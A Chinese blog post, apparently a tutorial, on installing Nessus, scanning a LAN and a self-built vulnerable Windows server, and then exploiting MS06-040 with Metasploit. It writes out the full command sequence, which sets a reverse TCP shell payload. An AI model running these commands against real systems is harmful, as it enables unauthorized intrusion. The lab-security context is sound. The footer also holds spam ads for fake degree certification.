『安全工具』Nessus多功能扫描器
0x 00 前言
写这篇博客,证明我还活着……
0x 01 安装Nessus
直接官网 www.tenable.com/products/nessus/select-your-operating-system
选择Nessus Home版下载,下载之后点击安装我这里是Nessus-6.1.0-x64版(附件处有百度网盘链接)
安装开始设置一个用户名和密码(记住,使用Nessus时会验证)
然后选择文件安装目录
之后会提示更新插件,这个要通过官网注册获取激活码来更新的
我们在官网 www.tenable.com/products/nessus/evaluate注册账户,打开注册邮箱就可以收到激活码了~
注意:注册邮箱不能使用 qq\163\gmail\hotmail 等公共邮箱,要用企业邮箱才可以
在这里推荐使用“一小时邮箱”进行注册,具体使用方法问度娘吧
填好激活码之后,插件自动更新,我这里5分钟左右就更新好了
0x 02 软件使用
浏览器打开 https://localhost:8834 后显示客户端界面
输入先前设置的用户名密码登录
1. 扫描局域网存活主机
点击“New Scan”,
在提供的默认模版里选择一个模版,这里选择“Host Discovery”,
在弹出的通用配置里设置“Name”(本次扫描的名字),“Target”(扫描目标)
我扫的是192.168.1.1全网段的 ,看图
之后“点击保存”后会进行自动扫描
2分钟之后结果就来了,在这里
看到了米有,9个主机在线,测试结果与真实环境相同的
NMAP也能完成主机探测我会乱说,所以说Nessus牛的地方不是在这,所以下面来了
2. 主机扫描
我在本地搭了个低版本服务器,IP为192.168.1.112
新建扫描,设置扫描策略为“Advanced Scan”,
然后 “Target”填上192.168.1.112
因为扫的是同个局域网内的速度还是比较快的,结果倒是让我惊呆了Orz...
20个紧急漏洞,8个高危漏洞,醉了有木有 = = 速度戳之
上面MSxx-xxx是微软漏洞编码,随随便便选择一个找到Exp就可以愉悦的玩耍了 ~~
接下来漏洞结合MSF进行漏洞利用~
当然,直接根据漏洞的编码百度一下利用方法也是可以的,这里就直接用BT5吧
找一个比较老的洞:ms06-040
BT5 的 CMD 输入 msfconsole 进入MSF欢迎界面(时间略长,等下就OK了)
我们按照MSF的一般执行过程来操作(选择模版—设置PAYLOAD—设置参数—攻击)
search ms06_040 // 查找ms06_040相关漏洞模块
找到对应模块后
use exploit/windows/smb/ms06_040_netapi // 使用ms06_040_netapi模块
show options // 查看漏洞配置信息
set PAYLOAD windows/shell/reverse_tcp // 设置PAYLOAD
set RHOST 192.168.1.112 // 目标IP
set LHOST 192.168.1.117 // 本机IP
// 端口号 和 目标类型 默认就OK了
exploit // 进行攻击
然后看拿到拿到了神马……
附件:
Nessus-6.1.0-x64 百度网盘:pan.baidu.com/s/1hq48j20 9fgu
『安全工具』Nessus多功能扫描器的更多相关文章
- 『安全工具』Nmap 强悍的端口扫描工具
作为时下流行的端口扫描工具,Nmap有因其扫描的隐密性有“端口扫描之王”之称 上图是黑客帝国(The Matrix)中崔妮蒂用Nmap入侵核发电站的能源管理系统 0x 01 Nmap介绍 Nmap是一 ...
- 『安全工具』目录扫描 DirBuster AND 御剑
要想熟悉目标网站的体系架构,知道网站有哪些目录是必不可少的 向AWVS,Burp类大型扫描工具也可以进行目录扫描,不过个人感觉远没有专业扫描工具来的简单,实在 0x 01 DirBuster 简介:D ...
- 『安全工具』注入神器SQLMAP
Pic by Baidu 0x 00 前言 正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来.... PS:国内类似软件也有阿D,明小子,挖掘机,当你用过他们之后你才会发现SQLM ...
- 『 效率工具 』Spring Boot版的轻量级代码生成器,减少70%以上的开发任务
一. 前言 之前很着迷于代码自动生成,减少写重复代码的工作量.网络上也搜索了很久,有基于插件的,有GUI的.但其配置和学习成本都比较高,都不是很如我意. 本想自己用SpringBoot写一个,在收集相 ...
- 『在线工具』 基于 xsser.me 源码 + BootStrap 前端 的 XSS 平台
乌云社区上一个小伙伴的对xsser.me 的源码做了 BS 的优化,本人已经搭建好,提供给大家免费使用,大牛求绕过,多谢. 地址: http://xss.evilclay.com (目前开放注册,不需 ...
- 『开发技巧』Python音频操作工具PyAudio上手教程
『开发技巧』Python音频操作工具PyAudio上手教程 0.引子 当需要使用Python处理音频数据时,使用python读取与播放声音必不可少,下面介绍一个好用的处理音频PyAudio工具包. ...
- Github 恶搞教程(一起『玩坏』自己的 Github 吧)
最近在伯乐在线读到一篇趣文,<如何在 Github『正确』做贡献>,里面各种能人恶搞 Github 的『Public contributions』,下面截取几个小伙伴的战绩: 顺藤摸瓜,发 ...
- 办理卡尔加里大学(本科)学历认证『微信171922772』calgary学位证成绩单使馆认证University of calgary
办理卡尔加里大学(本科)学历认证『微信171922772』calgary学位证成绩单使馆认证University of calgary Q.微信:171922772办理教育部国外学历学位认证海外大学毕 ...
- 办理阿尔伯塔大学(本科)学历认证『微信171922772』Alberta学位证成绩单使馆认证University of Alberta
办理阿尔伯塔大学(本科)学历认证『微信171922772』Alberta学位证成绩单使馆认证University of Alberta Q.微信:171922772办理教育部国外学历学位认证海外大学毕 ...
随机推荐
- fstream的用法
本文转载自 http://www.newxing.com/Tech/Program/Cpp/577.html C++文件流:fstream // 文件流ifstream // 输入文件流ofst ...
- QThread 与 QObject的关系
Threads and QObjects QThread 继承 QObject..它可以发送started和finished信号,也提供了一些slot函数. QObject.可以用于多线程,可以发送信 ...
- 如何安装Windows 8系统中的telnet组件
知识点分析:Window 8 系统中Telnet没有默认安装,成为了一个可选组件,“启用或关闭Windows功能”下即可添加此组件. 操作步骤:1.系统桌面下同时按住键盘上 “Windows” 和“X ...
- Sublime Text3 配置markdown插件
sublime是一个亮骚的文本编辑器,而且是跨三大平台,而markdown是一门标记语法,对于记录真是神器,具体语法百度很多,下面教你在sublime上配置markdown. 这两个神器结合起来简直好 ...
- Ubuntu+Win7+Samba实现文件共享
Samba是Ubuntu和Windows进行网络共享的工具,比如分享打印机,互相之间传输资料文件. 安装samba sudo apt-get install samba 查看samba是否安装成功 s ...
- [RxJS] Creation operators: from, fromArray, fromPromise
The of() operator essentially converted a list of arguments to an Observable. Since arrays are often ...
- Cocos2D-X2.2.3学习笔记12(瞬间动作)
到眼下我们已经学习了有 坐标系统 内存管理 UI系统 事件处理 几何图形 今天我们来学习动作管理OK 我们来看看类结构图 CCAction 全部动作的基类 以下派生了三个子类:CCFiniteTi ...
- 4G时代来临,运营商为谁搭台献唱?
4G时代已然来临.对用户而言,4G意味着更快的传输速度,以及更优质的移动网络体验. 只是对运营商而言.怎样部署4G却成了一大难题.众所周知,在全球范围内,4G LTE成为眼下最率先的移动宽带解 ...
- [转] When exactly does the virtual table pointer (in C++) gets set for an object?
PS: http://stackoverflow.com/questions/7934540/when-exactly-does-the-virtual-table-pointer-in-c-gets ...
- Java基础知识强化80:Math类random()方法的小扩展(控制产生目的数字的概率)
1. Math.random()方法: Math.random()出现的数据是0.0<= x < 1.0之间,随机出现一个数据Math.random()>0.1概率是0.9 那么如下 ...